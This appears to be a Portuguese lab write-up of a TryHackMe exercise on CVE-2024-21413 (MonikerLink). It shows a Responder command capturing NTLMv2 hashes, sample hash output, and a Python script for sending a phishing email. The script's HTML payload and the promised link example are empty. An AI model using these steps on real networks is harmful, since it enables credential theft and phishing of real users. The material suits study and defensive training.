
O projeto foi criado para demonstrar o uso de várias ferramentas para capturar hashes NTLM de usuários em uma rede e para executar ataques de phishing usando e-mail. Isso mostra como vulnerabilidades de autenticação de rede e métodos de phishing podem ser explorados para comprometer sistemas.
Objetivo do Projeto: O projeto foi criado para demonstrar o uso de várias ferramentas para capturar hashes NTLM de usuários em uma rede e para executar ataques de phishing usando e-mail. Isso mostra como vulnerabilidades de autenticação de rede e métodos de phishing podem ser explorados para comprometer sistemas.
Descrição do Processo
Executei o seguinte comando para iniciar o Responder:
root@ip-10-10-192-145:~# sudo responder -I ens5
Configurei o Responder para ouvir na interface ens5. Ele imediatamente começou a interceptar requisições de autenticação, permitindo-me visualizar hashes NTLM de usuários na rede, como THM-MONIKERLINK\tryhackme e WORKGROUP\Administrator. Aqui está como a saída se parecia ao capturar os hashes:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB
Esses hashes podem então ser usados para ataques como força bruta ou ataques de hash.
O link de phishing no e-mail se parecia com isto:
Aqui está o script Python completo usado para enviar o e-mail de phishing:
import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr
sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")
html_content = """\
"""message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email
msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)
server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()
try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)
try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()
Este script envia um e-mail com um link malicioso, que poderia potencialmente explorar a vulnerabilidade CVE-2024-21413.
Resultados Como resultado, consegui demonstrar dois aspectos principais:
Capturar hashes NTLM usando a ferramenta Responder, que é um passo crucial para atacar a autenticação de rede.
Phishing e exploração de vulnerabilidades via e-mail usando o script Python. O envio de e-mails de phishing com links maliciosos pode enganar usuários e levar ao comprometimento do sistema.
Este projeto mostrou como vulnerabilidades de rede e ataques de phishing podem ser explorados para obter acesso a sistemas. Também destacou a importância de se defender contra tais ataques através de métodos de autenticação robustos e filtragem de tráfego de e-mail.